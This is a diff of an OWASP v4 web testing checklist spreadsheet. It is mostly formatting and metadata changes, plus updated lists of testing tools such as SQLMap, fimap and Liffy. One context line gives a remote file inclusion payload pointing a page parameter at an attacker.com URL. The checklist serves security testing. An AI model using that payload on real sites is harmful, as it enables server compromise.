--- a/OWASPv4_Checklist.xlsx
+++ b/OWASPv4_Checklist.xlsx
@@ -1,15 +1,15 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="4" rupBuild="14420"/>
-  <workbookPr defaultThemeVersion="124226"/>
+  <fileVersion appName="xl" lastEdited="6" lowestEdited="4" rupBuild="26101"/>
+  <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\pphongthiproek\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/prathan/Github/OWASP-Testing-Checklist/"/>
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
-    <workbookView xWindow="120" yWindow="120" windowWidth="15135" windowHeight="9300"/>
+    <workbookView xWindow="120" yWindow="460" windowWidth="22740" windowHeight="12740"/>
   </bookViews>
   <sheets>
     <sheet name="Testing Checklist" sheetId="1" r:id="rId1"/>
@@ -39,7 +39,12 @@
     <definedName name="result">'Testing Checklist'!$A$128:$A$130</definedName>
     <definedName name="SkillRequired">References!$A$3:$A$8</definedName>
   </definedNames>
-  <calcPr calcId="152511"/>
+  <calcPr calcId="150001" concurrentCalc="0"/>
+  <extLst>
+    <ext xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" uri="{7523E5D3-25F3-A5E0-1632-64F254C22452}">
+      <mx:ArchID Flags="2"/>
+    </ext>
+  </extLst>
 </workbook>
 </file>
 
@@ -50,7 +55,7 @@
     <author>pphongthiproek</author>
   </authors>
   <commentList>
-    <comment ref="A5" authorId="0" shapeId="0">
+    <comment ref="A5" authorId="0">
       <text>
         <r>
           <rPr>
@@ -64,7 +69,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F5" authorId="1" shapeId="0">
+    <comment ref="F5" authorId="1">
       <text>
         <r>
           <rPr>
@@ -78,7 +83,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A6" authorId="0" shapeId="0">
+    <comment ref="A6" authorId="0">
       <text>
         <r>
           <rPr>
@@ -92,7 +97,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F6" authorId="1" shapeId="0">
+    <comment ref="F6" authorId="1">
       <text>
         <r>
           <rPr>
@@ -106,7 +111,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A7" authorId="1" shapeId="0">
+    <comment ref="A7" authorId="1">
       <text>
         <r>
           <rPr>
@@ -120,7 +125,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F7" authorId="1" shapeId="0">
+    <comment ref="F7" authorId="1">
       <text>
         <r>
           <rPr>
@@ -134,7 +139,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A8" authorId="1" shapeId="0">
+    <comment ref="A8" authorId="1">
       <text>
         <r>
           <rPr>
@@ -148,7 +153,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F8" authorId="1" shapeId="0">
+    <comment ref="F8" authorId="1">
       <text>
         <r>
           <rPr>
@@ -162,7 +167,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A11" authorId="1" shapeId="0">
+    <comment ref="A11" authorId="1">
       <text>
         <r>
           <rPr>
@@ -176,7 +181,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F11" authorId="1" shapeId="0">
+    <comment ref="F11" authorId="1">
       <text>
         <r>
           <rPr>
@@ -190,7 +195,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A12" authorId="1" shapeId="0">
+    <comment ref="A12" authorId="1">
       <text>
         <r>
           <rPr>
@@ -204,7 +209,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F12" authorId="1" shapeId="0">
+    <comment ref="F12" authorId="1">
       <text>
         <r>
           <rPr>
@@ -218,7 +223,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A13" authorId="1" shapeId="0">
+    <comment ref="A13" authorId="1">
       <text>
         <r>
           <rPr>
@@ -232,7 +237,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F13" authorId="1" shapeId="0">
+    <comment ref="F13" authorId="1">
       <text>
         <r>
           <rPr>
@@ -246,7 +251,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="A14" authorId="1" shapeId="0">
+    <comment ref="A14" authorId="1">
       <text>
         <r>
           <rPr>
@@ -260,7 +265,7 @@
         </r>
       </text>
     </comment>
-    <comment ref="F14" authorId="1" shapeId="0">
+    <comment ref="F14" authorId="1">
       <text>
         <r>
           <rPr>
@@ -279,7 +284,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="745" uniqueCount="460">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="745" uniqueCount="464">
   <si>
     <t>Information Gathering</t>
   </si>
@@ -595,9 +600,6 @@
   </si>
   <si>
     <t>Identify from hidden fields, parameters, methods HTTP header analysis</t>
-  </si>
-  <si>
-    <t>Webhosting.info, dnsrecon, Nmap, fierce</t>
   </si>
   <si>
     <t>Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
@@ -1461,9 +1463,6 @@
   </si>
   <si>
     <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
-  </si>
-  <si>
-    <t>SQLMap, Pangolin</t>
   </si>
   <si>
     <t>SQLMap, Mysqloit, Power Injector</t>
@@ -1534,9 +1533,6 @@
   <si>
     <t>RFI from malicious URL
 ?page.php?file=http://attacker.com/malicious_page</t>
-  </si>
-  <si>
-    <t>Burp Proxy, fimap</t>
   </si>
   <si>
     <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
@@ -1658,9 +1654,6 @@
 used (Origin Header)</t>
   </si>
   <si>
-    <t>Flare, Flasm, SWFScan, SWF Intruder</t>
-  </si>
-  <si>
     <t>Burp Proxy, ClickjackingTool</t>
   </si>
   <si>
@@ -1698,9 +1691,6 @@
   </si>
   <si>
     <t>Burp Proxy, ZAP, Wfuzz</t>
-  </si>
-  <si>
-    <t>Burp Proxy, ZAP, CookieDigger</t>
   </si>
   <si>
     <t>Burp Proxy, ZAP, Xenotix XSS</t>
@@ -1726,6 +1716,33 @@
   </si>
   <si>
     <t>Immunity Canvas, Spike, MSF, Nessus</t>
+  </si>
+  <si>
+    <t>Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
+  </si>
+  <si>
+    <t>Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue</t>
+  </si>
+  <si>
+    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
+  </si>
+  <si>
+    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
+  </si>
+  <si>
+    <t>Burp Proxy, ZAP, Liffy</t>
+  </si>
+  <si>
+    <t>Burp Proxy, fimap, Liffy</t>
+  </si>
+  <si>
+    <t>Burp Proxy (Autorize), ZAP</t>
+  </si>
+  <si>
+    <t>Burp Proxy, ForceSSL, ZAP, CookieDigger</t>
+  </si>
+  <si>
+    <t>Burp Proxy (csrf_token_detect), burpy, ZAP</t>
   </si>
 </sst>
 </file>
@@ -1977,25 +1994,25 @@
     </border>
     <border>
       <left style="thin">
-        <color indexed="64"/>
+        <color auto="1"/>
       </left>
       <right style="thin">
-        <color indexed="64"/>
+        <color auto="1"/>
       </right>
       <top style="thin">
-        <color indexed="64"/>
+        <color auto="1"/>
       </top>
       <bottom style="thin">
-        <color indexed="64"/>
+        <color auto="1"/>
       </bottom>
       <diagonal/>
     </border>
     <border>
       <left style="thin">
-        <color indexed="64"/>
+        <color auto="1"/>
       </left>
       <right style="thin">
-        <color indexed="64"/>
+        <color auto="1"/>
       </right>
       <top/>
       <bottom/>
@@ -2147,18 +2164,6 @@
     <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="right"/>
-    </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
@@ -2184,6 +2189,18 @@
     <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="right"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -2297,314 +2314,6 @@
       <fill>
         <patternFill>
           <bgColor rgb="FFFFFF00"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="0.79998168889431442"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="6" tint="-0.24994659260841701"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor rgb="FFFF0000"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill>
-          <bgColor theme="3" tint="0.79998168889431442"/>
         </patternFill>
       </fill>
     </dxf>
@@ -3598,6 +3307,314 @@
       </fill>
       <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
     </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="6" tint="-0.24994659260841701"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor rgb="FFFF0000"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill>
+          <bgColor theme="3" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
   </dxfs>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
   <extLst>
@@ -3615,85 +3632,24 @@
 <externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" mc:Ignorable="x14">
   <externalBook xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1">
     <sheetNames>
-      <sheetName val="Sheet1"/>
-      <sheetName val="Sheet2"/>
       <sheetName val="Sheet3"/>
     </sheetNames>
     <sheetDataSet>
       <sheetData sheetId="0" refreshError="1"/>
-      <sheetData sheetId="1" refreshError="1"/>
-      <sheetData sheetId="2">
-        <row r="2">
-          <cell r="G2" t="str">
-            <v>Select an option</v>
-          </cell>
-          <cell r="H2" t="str">
-            <v xml:space="preserve"> </v>
-          </cell>
-        </row>
-        <row r="3">
-          <cell r="G3" t="str">
-            <v>Not Applicable [0]</v>
-          </cell>
-          <cell r="H3">
-            <v>0</v>
-          </cell>
-        </row>
-        <row r="4">
-          <cell r="G4" t="str">
-            <v>System Administrators [2]</v>
-          </cell>
-          <cell r="H4">
-            <v>2</v>
-          </cell>
-        </row>
-        <row r="5">
-          <cell r="G5" t="str">
-            <v>Intranet Users [4]</v>
-          </cell>
-          <cell r="H5">
-            <v>4</v>
-          </cell>
-        </row>
-        <row r="6">
-          <cell r="G6" t="str">
-            <v>Partners [5]</v>
-          </cell>
-          <cell r="H6">
-            <v>5</v>
-          </cell>
-        </row>
-        <row r="7">
-          <cell r="G7" t="str">
-            <v>Authenticated users [6]</v>
-          </cell>
-          <cell r="H7">
-            <v>6</v>
-          </cell>
-        </row>
-        <row r="8">
-          <cell r="G8" t="str">
-            <v>Anonymous Internet users [9]</v>
-          </cell>
-          <cell r="H8">
-            <v>9</v>
-          </cell>
-        </row>
-      </sheetData>
     </sheetDataSet>
   </externalBook>
 </externalLink>
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="Table1" displayName="Table1" ref="A4:F14" totalsRowShown="0" headerRowDxfId="125">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="Table1" displayName="Table1" ref="A4:F14" totalsRowShown="0" headerRowDxfId="81">
   <autoFilter ref="A4:F14"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Information Gathering" dataDxfId="124"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="123"/>
-    <tableColumn id="3" name="Description" dataDxfId="122"/>
-    <tableColumn id="4" name="Tools" dataDxfId="121"/>
-    <tableColumn id="5" name="Result" dataDxfId="120"/>
+    <tableColumn id="1" name="Information Gathering" dataDxfId="80"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="79"/>
+    <tableColumn id="3" name="Description" dataDxfId="78"/>
+    <tableColumn id="4" name="Tools" dataDxfId="77"/>
+    <tableColumn id="5" name="Result" dataDxfId="76"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3701,14 +3657,14 @@
 </file>
 
 <file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="71">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="27">
   <autoFilter ref="A96:F99"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Cryptography" dataDxfId="70"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="69"/>
-    <tableColumn id="3" name="Description" dataDxfId="68"/>
-    <tableColumn id="4" name="Tools" dataDxfId="67"/>
-    <tableColumn id="5" name="Result" dataDxfId="66"/>
+    <tableColumn id="1" name="Cryptography" dataDxfId="26"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="25"/>
+    <tableColumn id="3" name="Description" dataDxfId="24"/>
+    <tableColumn id="4" name="Tools" dataDxfId="23"/>
+    <tableColumn id="5" name="Result" dataDxfId="22"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3716,14 +3672,14 @@
 </file>
 
 <file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="65">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="21">
   <autoFilter ref="A112:F124"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Client Side Testing" dataDxfId="64"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="63"/>
-    <tableColumn id="3" name="Description" dataDxfId="62"/>
-    <tableColumn id="4" name="Tools" dataDxfId="61"/>
-    <tableColumn id="5" name="Result" dataDxfId="60"/>
+    <tableColumn id="1" name="Client Side Testing" dataDxfId="20"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="19"/>
+    <tableColumn id="3" name="Description" dataDxfId="18"/>
+    <tableColumn id="4" name="Tools" dataDxfId="17"/>
+    <tableColumn id="5" name="Result" dataDxfId="16"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3731,14 +3687,14 @@
 </file>
 
 <file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
